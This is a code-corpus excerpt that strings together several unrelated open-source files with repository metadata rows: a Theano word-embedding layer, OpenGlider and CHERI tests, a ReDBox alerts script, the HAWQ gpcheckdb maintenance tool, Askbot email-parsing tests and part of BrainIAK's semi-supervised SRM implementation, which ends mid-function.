ie. a word from the same context, or a random, out-of-context word),
        identified by their index in a vocabulary, into two dense representations
(word representation and context representation).
Then it returns activation(dot(pivot_embedding, context_embedding)),
which can be trained to encode the probability
of finding the context word in the context of the pivot word
(or reciprocally depending on your training procedure).
The layer ingests integer tensors of shape:
(nb_samples, 2)
and outputs a float tensor of shape
(nb_samples, 1)
The 2nd dimension encodes (pivot, context).
input_dim is the size of the vocabulary.
For more context, see Mikolov et al.:
        Efficient Estimation of Word Representations in Vector Space
http://arxiv.org/pdf/1301.3781v3.pdf
'''
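    # Sketch (shapes are illustrative): an int32 input of shape (nb_samples, 2)
    # holding (pivot, context) index pairs yields a (nb_samples, 1) tensor of
    # activation(dot(W_w[pivot], W_c[context])).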
def __init__(self, input_dim, proj_dim=128,
init='uniform', activation='sigmoid', weights=None):
super(WordContextProduct, self).__init__()
self.input_dim = input_dim
self.proj_dim = proj_dim
self.init = initializations.get(init)
self.activation = activations.get(activation)
self.input = T.imatrix()
# two different embeddings for pivot word and its context
# because p(w|c) != p(c|w)
self.W_w = self.init((input_dim, proj_dim))
self.W_c = self.init((input_dim, proj_dim))
self.params = [self.W_w, self.W_c]
if weights is not None:
self.set_weights(weights)
def get_output(self, train=False):
X = self.get_input(train)
w = self.W_w[X[:, 0]] # nb_samples, proj_dim
c = self.W_c[X[:, 1]] # nb_samples, proj_dim
dot = T.sum(w * c, axis=1)
dot = theano.tensor.reshape(dot, (X.shape[0], 1))
return self.activation(dot)
def get_config(self):
return {"name": self.__class__.__name__,
"input_dim": self.input_dim,
"proj_dim": self.proj_dim,
"init": self.init.__name__,
"activation": self.activation.__name__}
| mit | 4,487,056,170,492,720,000 | 35.473684 | 118 | 0.604824 | false |
hiaselhans/OpenGlider | tests/test_patterns.py | 2 | 1407 | import unittest
import tempfile
import os
import openglider
import openglider.plots
import openglider.plots.glider
from common import TestCase
TEMPDIR = tempfile.gettempdir()
class TestPlots(TestCase):
def setUp(self, complete=True):
self.glider_2d = self.import_glider_2d()
self.glider_3d = self.glider_2d.get_glider_3d()
self.plotmaker = openglider.plots.PlotMaker(self.glider_3d)
@unittest.skip("not working")
def test_patterns_panels(self):
self.plotmaker.get_panels()
dwg = self.plotmaker.get_all_stacked()["panels"]
dwg.export_dxf(os.path.join(TEMPDIR, "test_panels.dxf"))
# Traceback (most recent call last):
# File "/home/travis/build/booya-at/OpenGlider/tests/test_patterns.py", line 22, in test_patterns_dribs
# dwg = self.plotmaker.get_all_stacked()["dribs"]
# AttributeError: 'PlotMaker' object has no attribute 'get_all_stacked'
@unittest.skip("not working")
def test_patterns_dribs(self):
self.plotmaker.get_dribs()
dwg = self.plotmaker.get_all_stacked()["dribs"]
dwg.export_dxf(os.path.join(TEMPDIR, "test_dribs.dxf"))
@unittest.skip("not working")
def test_patterns_ribs(self):
self.plotmaker.get_ribs()
dwg = self.plotmaker.get_all_stacked()["ribs"]
dwg.export_dxf(os.path.join(TEMPDIR, "test_ribs.dxf"))
if __name__ == "__main__":
unittest.main() | gpl-3.0 | 336,995,790,583,398,340 | 32.52381 | 105 | 0.678038 | false |
redbox-mint/redbox | config/src/main/config/home/lib/jython/alertlib/NewAlerts.py | 1 | 2631 | import shutil
import sys
import os
from com.googlecode.fascinator import HarvestClient
from com.googlecode.fascinator.common import FascinatorHome
from com.googlecode.fascinator.common import JsonObject
from com.googlecode.fascinator.common import JsonSimple
from java.io import File
from java.io import FileInputStream
from java.io import InputStreamReader
from java.lang import Exception
from java.util import LinkedHashMap
from org.json.simple import JSONArray
from Alert import Alert
from AlertException import AlertException
from Mapper import *
class NewAlerts:
    """The NewAlerts class is the 'entry point' for the alert system.
See the README.md in this folder for further information
"""
def run(self, context):
self.log = context["log"]
self.config = context["systemConfig"]
self.log.debug("Started alerts processing.")
#self.log.debug("Alert config: " + self.config.toString(True))
## Determine ReDBox version in system-config
self.redboxVersion = self.config.getString(None, "redbox.version.string")
self.log.debug("ReDBox version is %s" % self.redboxVersion)
if self.redboxVersion is None:
self.log.debug("ReDBox version was not provided in the config")
raise AlertException("Unable to determine configuration")
tmpConf = self.config.getObject('new-alerts')
if tmpConf is None:
self.log.info("No alert configuration was provided")
return False
self.alertsConfig = mapMapFromJava(tmpConf)
baseline = {}
if "baseline" in self.alertsConfig:
baseline = self.alertsConfig["baseline"]
if not 'alertSet' in self.alertsConfig:
raise AlertException("Unable to determine configuration")
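        # Illustrative config shape, inferred from the lookups above:
        #   "new-alerts": {"baseline": {...},
        #                  "alertSet": [{"name": "...", ...}, ...]}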
for alertItem in self.alertsConfig["alertSet"]:
self.log.info("Processing alert: %s." % alertItem["name"])
try:
alert = Alert(self.redboxVersion, alertItem, baseline, self.log)
alert.processAlert()
except Exception, e:
#The Alert class will log this for us so continue to the next alert
#Some exceptions stop an alert from running at all so log them just in case
self.log.error("Alert [%s] encountered problems - please review the log files in the associated .processed directory. Exception was: %s" % (alertItem["name"], e.message))
self.log.debug("Alerts processing complete.")
return True
| gpl-2.0 | 5,667,524,529,944,497,000 | 35.041096 | 186 | 0.657925 | false |
outofmem0ry/incubator-hawq | tools/bin/lib/gpcheckdb.py | 12 | 7952 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''
gpcheckdb - checks db for required upkeep actions
Usage: gpcheckdb [-U uname] [-h host] [-p port] [-d dbname]
-U: database user name (PGUSER)
-h: database server host (PGHOST)
-p: database server port (PGPORT)
-d: database name (PGDATABASE)
-v: verbose
-V: very verbose
'''
import os, sys
progname = os.path.split(sys.argv[0])[-1]
if sys.version_info < (2,5,0):
sys.exit(
'''Error: %s requires Python version 2.5 or greater.
    Please upgrade the python installed on this machine.''' % progname)
import subprocess, time, datetime, threading, Queue, pickle, random
############
class __globals__:
opt = {}
for o in 'vV': opt['-' + o] = False
opt['-U'] = os.getenv('PGUSER') or ''
opt['-h'] = os.getenv('PGHOST') or ''
opt['-p'] = os.getenv('PGPORT') or ''
opt['-d'] = os.getenv('PGDATABASE') or ''
GV = __globals__()
############
def usage(exitarg):
print __doc__
sys.exit(exitarg)
############
def humantime(td):
d = td.days > 0 and td.days or 0
h = int(td.seconds / 60 / 60)
m = int(td.seconds / 60) % 60
s = td.seconds % 60
ret = ''
if d: ret = ret + '%dD ' % d
if h: ret = ret + '%dh ' % h
ret = ret + ('%dm %ds' % (m, s))
return ret
############
def tstamp():
return datetime.datetime.now().strftime('[%Y-%m-%d %H:%M:%S]')
############
def msg(s):
print '%s %s' % (tstamp(), s)
def vmsg(s):
if GV.opt['-v']: msg(s)
def vvmsg(s):
if GV.opt['-V']: msg(s)
############
def die(s):
sys.exit('%s ERROR: %s' % (tstamp(), s))
############
def confirm(s):
    if not GV.opt.get('-f') and sys.stdin.isatty():
ok = raw_input('%s\n ... proceed (y/n)? ' % s)
print
ok = ok.strip().lower()
return ok and ok[0] == 'y'
return True
############
def parseCommandLine():
import getopt
try:
(options, args) = getopt.getopt(sys.argv[1:], '?VvU:h:p:d:')
except Exception, e:
usage('Error: ' + str(e))
for (switch, val) in options:
if switch == '-?': usage(0)
elif switch[1] in 'Vv': GV.opt[switch] = True
elif switch[1] in 'Uhpd': GV.opt[switch] = val
if not GV.opt['-d']:
usage('Error: please specify -d database')
if not GV.opt['-U']:
usage('Error: please specify -U user')
############
def run(cmd):
vvmsg(cmd)
p = os.popen(cmd)
out = p.readlines()
if GV.opt['-V']:
for line in out: vvmsg(line[:-1])
rc = p.close()
return (rc, out)
#####################################################
def psql_open(sql, echo=False, quiet=True):
sql = sql.strip()
if echo: msg("SQL: " + sql)
cmd = ['psql']
if quiet: cmd.append('-q')
cmd.append('-At')
cmd.append('-c')
cmd.append(sql)
stime = time.time()
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
p.x_echo = echo
p.x_quiet = quiet
p.x_stime = stime
p.x_sql = sql
return p
def psql_wait(p):
out = p.stdout.readlines()
rc = p.wait()
etime = time.time()
if not p.x_quiet:
for i in out: print i,
if rc:
die('PSQL ERROR\nSQL: ' + p.x_sql)
if p.x_echo:
msg("ELAPSED: " + str(etime - p.x_stime))
return out
def psql(sql, echo=False, quiet=True):
p = psql_open(sql, echo, quiet)
return psql_wait(p)
############
def pmap(func, jlist, numThreads = 16):
if (numThreads > len(jlist)):
numThreads = len(jlist)
inq = Queue.Queue(len(jlist))
for i in jlist: inq.put(i)
outq = Queue.Queue(len(jlist))
def work():
try:
while True:
outq.put((None, func(inq.get_nowait())))
except Queue.Empty: pass
except:
outq.put( (sys.exc_info(), None) )
# drain
try:
while True: inq.get_nowait()
except Queue.Empty: pass
thread = [threading.Thread(target=work) for i in xrange(numThreads)]
for t in thread: t.start()
for t in thread: t.join()
ret = []
try:
while True:
(ex, result) = outq.get_nowait()
if ex:
raise ex
ret.append(result)
except Queue.Empty: pass
return ret
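# Usage sketch (hypothetical work list): pmap(lambda t: psql('ANALYZE ' + t),
# tables, 8) runs the function over the items with up to 8 worker threads and
# re-raises the first exception captured in a worker, if any.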
############
def chk_not_analyzed():
print '-----------------------'
print 'LOOKING FOR TABLES NOT ANALYZED'
out = psql('''
SELECT ' * ' || nspname || '.' || relname
from pg_class, pg_namespace
where reltuples=0 and relpages=0 and relnamespace=pg_namespace.oid
and nspname not in ('information_schema','pg_aoseg',
'pg_bitmapindex', 'pg_catalog', 'pg_toast')
and relkind='r'
order by 1
''')
print ' %d object(s) found' % len(out)
print "".join(out)
############
def chk_users_without_resource_queues():
print '-----------------------'
print 'LOOKING FOR USERS WITHOUT RESOURCE QUEUES'
out = psql('''
SELECT ' * ' || rolname
from pg_roles
where rolresqueue is null and rolsuper='f'
order by 1
''')
print ' %d object(s) found' % len(out)
print "".join(out)
############
def chk_tables_with_big_skew():
print '-----------------------'
print 'LOOKING FOR TABLES WITH BIG SKEW'
out = psql('''
select ' '||max(c)||' ' ||min(c)||' '|| avg(c)||' '|| stddev(c)||' '|| (max(c) - min(c))/max(c) as p_diff_max_min
from (
select case when c is null then 0 else c end, gp_segment_id_present
from (select generate_series(0,79) as gp_segment_id_present ) t1
left outer join
(select count(*) as c, gp_segment_id from :table group by 2) t2
on t1.gp_segment_id_present =t2.gp_segment_id
) as data
''')
############
def chk_guc():
print '-----------------------'
print 'CHECKING GUCS'
out = psql('''
SELECT current_setting('lc_collate'),
current_setting('lc_monetary'),
current_setting('lc_numeric'),
current_setting('max_connections'),
current_setting('gp_fault_action'),
current_setting('work_mem')
''')
(lc_collate, lc_monetary, lc_numeric, max_connections,
gp_fault_action, work_mem) = out[0].strip().split('|')
print ' lc_collate =', lc_collate
print ' lc_monetary =', lc_monetary
print ' lc_numeric =', lc_numeric
print ' max_connections =', max_connections
print ' gp_fault_action =', gp_fault_action
print ' work_mem =', work_mem
############
def main():
parseCommandLine()
# set up env for psql
os.putenv("PGOPTIONS", '-c gp_session_role=utility')
os.putenv("PGDATABASE", GV.opt['-d'])
os.putenv("PGHOST", GV.opt['-h'])
os.putenv("PGPORT", GV.opt['-p'])
os.putenv("PGUSER", GV.opt['-U'])
# check for tables not analyzed
chk_not_analyzed()
# check for tables with significant skew
#chk_tables_with_big_skew()
# check for users not associated with any resource queues
chk_users_without_resource_queues()
# check for a few guc settings (e.g., hawq_re_memory_overcommit_max)
chk_guc()
if __name__ == '__main__':
main()
| apache-2.0 | -5,511,619,666,447,308,000 | 25.684564 | 113 | 0.554452 | false |
8l/beri | cheritest/trunk/tests/cp2/test_cp2_csdr_unpriv.py | 2 | 2103 | #-
# Copyright (c) 2011 Robert N. M. Watson
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
#
# Test csdr (store double word via capability, offset by register) with a
# constrained capability.
#
class test_cp2_csdr_unpriv(BaseBERITestCase):
@attr('capabilities')
def test_cp2_csdr_underflow(self):
'''Test that csdr did not write below constrained capability'''
self.assertRegisterEqual(self.MIPS.a0, 0x0, "csdr underflow with constrained capability")
@attr('capabilities')
def test_cp2_csdr_data(self):
'''Test that csdr wrote correctly via constrained capability'''
self.assertRegisterEqual(self.MIPS.a1, 0x0123456789abcdef, "csdr data written incorrectly with constrained capability")
@attr('capabilities')
def test_cp2_csdr_overflow(self):
'''Test that csdr did not write above constrained capability'''
self.assertRegisterEqual(self.MIPS.a2, 0x0, "csdr overflow with constrained capability")
| apache-2.0 | 387,148,937,092,373,300 | 41.06 | 127 | 0.748455 | false |
PearsonIOKI/compose-forum | askbot/tests/email_parsing_tests.py | 3 | 3845 | # -*- coding: utf-8 -*-
from django.conf import settings as django_settings
from django.template import Context
from django.template.loader import get_template
from askbot import mail
from askbot import models
from askbot.tests import utils
from askbot.utils.html import get_text_from_html
class EmailParsingTests(utils.AskbotTestCase):
def setUp(self):
self.template_name = 'email/welcome_lamson_on.html'
self.context = {'site_name': 'askbot.com',
'email_code': 'DwFwndQty'}
template = get_template(self.template_name)
self.rendered_template = template.render(Context(self.context))
self.expected_output = 'Welcome to askbot.com!\n\nImportant: Please reply to this message, without editing it. We need this to determine your email signature and that the email address is valid and was typed correctly.\n\nUntil we receive the response from you, you will not be able ask or answer questions on askbot.com by email.\n\nSincerely,askbot.com Administrator\n\nDwFwndQty'
def test_gmail_rich_text_response_stripped(self):
text = u'\n\nthis is my reply!\n\nOn Wed, Oct 31, 2012 at 1:45 AM, <[email protected]> wrote:\n\n> **\n> '
self.assertEqual(mail.extract_reply(text), 'this is my reply!')
def test_gmail_plain_text_response_stripped(self):
text = u'\n\nthis is my another reply!\n\nOn Wed, Oct 31, 2012 at 1:45 AM, <[email protected]> wrote:\n>\n> '
self.assertEqual(mail.extract_reply(text), 'this is my another reply!')
def test_yahoo_mail_response_stripped(self):
text = u'\n\nthis is my reply!\n\n\n\n________________________________\n From: "[email protected]" <[email protected]>\nTo: [email protected] \nSent: Wednesday, October 31, 2012 2:41 AM\nSubject: "This is my test question"\n \n\n \n \n \n'
self.assertEqual(mail.extract_reply(text), 'this is my reply!')
def test_kmail_plain_text_response_stripped(self):
text = u'On Monday 01 October 2012 21:22:44 you wrote: \n\nthis is my reply!'
self.assertEqual(mail.extract_reply(text), 'this is my reply!')
def test_outlook_com_with_rtf_response_stripped(self):
text = u'outlook.com (new hotmail) with RTF on \n\nSubject: "Posting a question by email." \nFrom: [email protected] \nTo: [email protected] \nDate: Thu, 1 Nov 2012 16:30:27 +0000'
self.assertEqual(
mail.extract_reply(text),
'outlook.com (new hotmail) with RTF on'
)
self.assertEqual(
mail.extract_reply(text),
'outlook.com (new hotmail) with RTF on'
)
def test_outlook_com_plain_text_response_stripped(self):
text = u'reply from hotmail without RTF \n________________________________ \n> Subject: "test with recovered signature" \n> From: [email protected] \n> To: [email protected] \n> Date: Thu, 1 Nov 2012 16:44:35 +0000'
self.assertEqual(
mail.extract_reply(text),
u'reply from hotmail without RTF'
)
def test_outlook_desktop1(self):
text = """some real text
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Wednesday, August 07, 2013 11:00 AM
To: Jane Doe
Subject: "One more test question from email."
"""
self.assertEqual(mail.extract_reply(text), "some real text")
def test_blackberry(self):
text = """Lorem ipsum lorem ipsum
blah blah blah
some more text here
Joe
________________________________________
From: [email protected]
Sent: Thursday, August 15, 2013 1:58:21 AM
To: Mister Joe
Subject: Our forum: "some text in the subject line"
"""
expected = """Lorem ipsum lorem ipsum
blah blah blah
some more text here
Joe"""
self.assertEqual(mail.extract_reply(text), expected)
| gpl-3.0 | -2,865,255,889,403,725,000 | 43.183908 | 390 | 0.654787 | false |
mihaic/brainiak | brainiak/funcalign/sssrm.py | 1 | 29553 | # Copyright 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Semi-Supervised Shared Response Model (SS-SRM)
The implementations are based on the following publications:
.. [Turek2016] "A Semi-Supervised Method for Multi-Subject fMRI Functional
Alignment",
J. S. Turek, T. L. Willke, P.-H. Chen, P. J. Ramadge
IEEE International Conference on Acoustics, Speech and Signal Processing
(ICASSP), 2017, pp. 1098-1102.
https://doi.org/10.1109/ICASSP.2017.7952326
"""
# Authors: Javier Turek (Intel Labs), 2016
import logging
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin, ClassifierMixin
from sklearn.utils import assert_all_finite
from sklearn.utils.validation import NotFittedError
from sklearn.utils.multiclass import unique_labels
import theano
import theano.tensor as T
import theano.compile.sharedvalue as S
from pymanopt.manifolds import Euclidean
from pymanopt.manifolds import Product
from pymanopt.solvers import ConjugateGradient
from pymanopt import Problem
from pymanopt.manifolds import Stiefel
import gc
from brainiak.utils import utils
from brainiak.funcalign import srm
__all__ = [
"SSSRM",
]
logger = logging.getLogger(__name__)
# FIXME workaround for Theano failure on macOS Conda builds
# https://travis-ci.org/github/brainiak/brainiak/jobs/689445834#L1414
# Inspired by workaround from PyMC3
# https://github.com/pymc-devs/pymc3/pull/3767
theano.config.gcc.cxxflags = "-Wno-c++11-narrowing"
class SSSRM(BaseEstimator, ClassifierMixin, TransformerMixin):
"""Semi-Supervised Shared Response Model (SS-SRM)
Given multi-subject data, factorize it as a shared response S among all
subjects and an orthogonal transform W per subject, using also labeled
data to train a Multinomial Logistic Regression (MLR) classifier (with
l2 regularization) in a semi-supervised manner:
.. math::
(1-\\alpha) Loss_{SRM}(W_i,S;X_i)
        + \\alpha/\\gamma Loss_{MLR}(\\theta, bias; \\{(W_i^T \\times Z_i, y_i)\\})
+ R(\\theta)
:label: sssrm-eq
(see Equations (1) and (4) in [Turek2016]_).
Parameters
----------
n_iter : int, default: 10
Number of iterations to run the algorithm.
features : int, default: 50
Number of features to compute.
gamma : float, default: 1.0
Regularization parameter for the classifier.
alpha : float, default: 0.5
Balance parameter between the SRM term and the MLR term.
rand_seed : int, default: 0
Seed for initializing the random number generator.
Attributes
----------
w_ : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) for each subject.
s_ : array, shape=[features, samples]
The shared response.
theta_ : array, shape=[classes, features]
The MLR class plane parameters.
bias_ : array, shape=[classes]
The MLR class biases.
classes_ : array of int, shape=[classes]
Mapping table for each classes to original class label.
random_state_: `RandomState`
Random number generator initialized using rand_seed
Note
----
The number of voxels may be different between subjects. However, the
number of samples for the alignment data must be the same across
subjects. The number of labeled samples per subject can be different.
The Semi-Supervised Shared Response Model is approximated using the
Block-Coordinate Descent (BCD) algorithm proposed in [Turek2016]_.
This is a single node version.
"""
def __init__(self, n_iter=10, features=50, gamma=1.0, alpha=0.5,
rand_seed=0):
self.n_iter = n_iter
self.features = features
self.gamma = gamma
self.alpha = alpha
self.rand_seed = rand_seed
return
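    # Usage sketch (shapes are illustrative, not prescriptive):
    #   model = SSSRM(n_iter=10, features=50, gamma=1.0, alpha=0.5)
    #   model.fit(X, y, Z)   # X[i]: voxels_i x n_align, Z[i]: voxels_i x samples_i
    #   predictions = model.predict(Z_new)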
def fit(self, X, y, Z):
"""Compute the Semi-Supervised Shared Response Model
Parameters
----------
X : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
y : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in Z.
Z : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject
for training the MLR classifier.
"""
logger.info('Starting SS-SRM')
# Check that the alpha value is in range (0.0,1.0)
if 0.0 >= self.alpha or self.alpha >= 1.0:
raise ValueError("Alpha parameter should be in range (0.0, 1.0)")
# Check that the regularizer value is positive
if 0.0 >= self.gamma:
raise ValueError("Gamma parameter should be positive.")
# Check the number of subjects
if len(X) <= 1 or len(y) <= 1 or len(Z) <= 1:
raise ValueError("There are not enough subjects in the input "
"data to train the model.")
if not (len(X) == len(y)) or not (len(X) == len(Z)):
raise ValueError("Different number of subjects in data.")
# Check for input data sizes
if X[0].shape[1] < self.features:
raise ValueError(
"There are not enough samples to train the model with "
"{0:d} features.".format(self.features))
# Check if all subjects have same number of TRs for alignment
# and if alignment and classification data have the same number of
        # voxels per subject. Also check that there are labels for all the
        # classification samples.
number_trs = X[0].shape[1]
number_subjects = len(X)
for subject in range(number_subjects):
assert_all_finite(X[subject])
assert_all_finite(Z[subject])
if X[subject].shape[1] != number_trs:
raise ValueError("Different number of alignment samples "
"between subjects.")
if X[subject].shape[0] != Z[subject].shape[0]:
raise ValueError("Different number of voxels between alignment"
" and classification data (subject {0:d})"
".".format(subject))
if Z[subject].shape[1] != y[subject].size:
raise ValueError("Different number of samples and labels in "
"subject {0:d}.".format(subject))
# Map the classes to [0..C-1]
new_y = self._init_classes(y)
# Run SS-SRM
self.w_, self.s_, self.theta_, self.bias_ = self._sssrm(X, Z, new_y)
return self
def _init_classes(self, y):
"""Map all possible classes to the range [0,..,C-1]
Parameters
----------
y : list of arrays of int, each element has shape=[samples_i,]
Labels of the samples for each subject
Returns
-------
new_y : list of arrays of int, each element has shape=[samples_i,]
Mapped labels of the samples for each subject
Note
----
The mapping of the classes is saved in the attribute classes_.
"""
self.classes_ = unique_labels(utils.concatenate_not_none(y))
new_y = [None] * len(y)
for s in range(len(y)):
new_y[s] = np.digitize(y[s], self.classes_) - 1
return new_y
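        # Example (illustrative): y = [np.array([7, 3, 7])] produces
        # classes_ == [3, 7] and mapped labels [array([1, 0, 1])].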
def transform(self, X, y=None):
"""Use the model to transform matrix to Shared Response space
Parameters
----------
X : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject
note that number of voxels and samples can vary across subjects.
y : not used as it only applies the mappings
Returns
-------
s : list of 2D arrays, element i has shape=[features_i, samples_i]
Shared responses from input data (X)
"""
# Check if the model exist
if hasattr(self, 'w_') is False:
raise NotFittedError("The model fit has not been run yet.")
# Check the number of subjects
if len(X) != len(self.w_):
raise ValueError("The number of subjects does not match the one"
" in the model.")
s = [None] * len(X)
for subject in range(len(X)):
s[subject] = self.w_[subject].T.dot(X[subject])
return s
def predict(self, X):
"""Classify the output for given data
Parameters
----------
X : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject
The number of voxels should be according to each subject at
the moment of training the model.
Returns
-------
p: list of arrays, element i has shape=[samples_i]
Predictions for each data sample.
"""
# Check if the model exist
if hasattr(self, 'w_') is False:
raise NotFittedError("The model fit has not been run yet.")
# Check the number of subjects
if len(X) != len(self.w_):
raise ValueError("The number of subjects does not match the one"
" in the model.")
X_shared = self.transform(X)
p = [None] * len(X_shared)
for subject in range(len(X_shared)):
sumexp, _, exponents = utils.sumexp_stable(
self.theta_.T.dot(X_shared[subject]) + self.bias_)
p[subject] = self.classes_[
(exponents / sumexp[np.newaxis, :]).argmax(axis=0)]
return p
def _sssrm(self, data_align, data_sup, labels):
"""Block-Coordinate Descent algorithm for fitting SS-SRM.
Parameters
----------
data_align : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
data_sup : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
Returns
-------
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
s : array, shape=[features, samples]
The shared response.
"""
classes = self.classes_.size
# Initialization:
self.random_state_ = np.random.RandomState(self.rand_seed)
random_states = [
np.random.RandomState(self.random_state_.randint(2**32))
for i in range(len(data_align))]
# Set Wi's to a random orthogonal voxels by TRs
w, _ = srm._init_w_transforms(data_align, self.features, random_states)
# Initialize the shared response S
s = SSSRM._compute_shared_response(data_align, w)
# Initialize theta and bias
theta, bias = self._update_classifier(data_sup, labels, w, classes)
# calculate and print the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup, labels,
w, s, theta, bias)
logger.info('Objective function %f' % objective)
# Main loop:
for iteration in range(self.n_iter):
logger.info('Iteration %d' % (iteration + 1))
# Update the mappings Wi
w = self._update_w(data_align, data_sup, labels, w, s, theta, bias)
# Output the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup,
labels, w, s, theta, bias)
logger.info('Objective function after updating Wi %f'
% objective)
# Update the shared response S
s = SSSRM._compute_shared_response(data_align, w)
# Output the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup,
labels, w, s, theta, bias)
logger.info('Objective function after updating S %f'
% objective)
# Update the MLR classifier, theta and bias
theta, bias = self._update_classifier(data_sup, labels, w, classes)
# Output the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup,
labels, w, s, theta, bias)
logger.info('Objective function after updating MLR %f'
% objective)
return w, s, theta, bias
def _update_classifier(self, data, labels, w, classes):
"""Update the classifier parameters theta and bias
Parameters
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
w : list of 2D array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
classes : int
The number of classes in the classifier.
Returns
-------
theta : array, shape=[features, classes]
The MLR parameter for the class planes.
bias : array shape=[classes,]
The MLR parameter for class biases.
"""
# Stack the data and labels for training the classifier
data_stacked, labels_stacked, weights = \
SSSRM._stack_list(data, labels, w)
features = w[0].shape[1]
total_samples = weights.size
data_th = S.shared(data_stacked.astype(theano.config.floatX))
val_ = S.shared(labels_stacked)
total_samples_S = S.shared(total_samples)
theta_th = T.matrix(name='theta', dtype=theano.config.floatX)
bias_th = T.col(name='bias', dtype=theano.config.floatX)
constf2 = S.shared(self.alpha / self.gamma, allow_downcast=True)
weights_th = S.shared(weights)
log_p_y_given_x = \
T.log(T.nnet.softmax((theta_th.T.dot(data_th.T)).T + bias_th.T))
f = -constf2 * T.sum((log_p_y_given_x[T.arange(total_samples_S), val_])
/ weights_th) + 0.5 * T.sum(theta_th ** 2)
manifold = Product((Euclidean(features, classes),
Euclidean(classes, 1)))
problem = Problem(manifold=manifold, cost=f, arg=[theta_th, bias_th],
verbosity=0)
solver = ConjugateGradient(mingradnorm=1e-6)
solution = solver.solve(problem)
theta = solution[0]
bias = solution[1]
del constf2
del theta_th
del bias_th
del data_th
del val_
del solver
del solution
return theta, bias
    def _update_w(self, data_align, data_sup, labels, w, s, theta, bias):
        """Update the orthogonal transforms (mappings) W_i for all subjects.
Parameters
----------
data_align : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
data_sup : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
s : array, shape=[features, samples]
The shared response.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
w : list of 2D array, element i has shape=[voxels_i, features]
The updated orthogonal transforms (mappings).
"""
subjects = len(data_align)
s_th = S.shared(s.astype(theano.config.floatX))
theta_th = S.shared(theta.T.astype(theano.config.floatX))
bias_th = S.shared(bias.T.astype(theano.config.floatX),
broadcastable=(True, False))
for subject in range(subjects):
logger.info('Subject Wi %d' % subject)
# Solve for subject i
# Create the theano function
w_th = T.matrix(name='W', dtype=theano.config.floatX)
data_srm_subject = \
S.shared(data_align[subject].astype(theano.config.floatX))
constf1 = \
S.shared((1 - self.alpha) * 0.5 / data_align[subject].shape[1],
allow_downcast=True)
f1 = constf1 * T.sum((data_srm_subject - w_th.dot(s_th))**2)
if data_sup[subject] is not None:
lr_samples_S = S.shared(data_sup[subject].shape[1])
data_sup_subject = \
S.shared(data_sup[subject].astype(theano.config.floatX))
labels_S = S.shared(labels[subject])
constf2 = S.shared(-self.alpha / self.gamma
/ data_sup[subject].shape[1],
allow_downcast=True)
log_p_y_given_x = T.log(T.nnet.softmax((theta_th.dot(
w_th.T.dot(data_sup_subject))).T + bias_th))
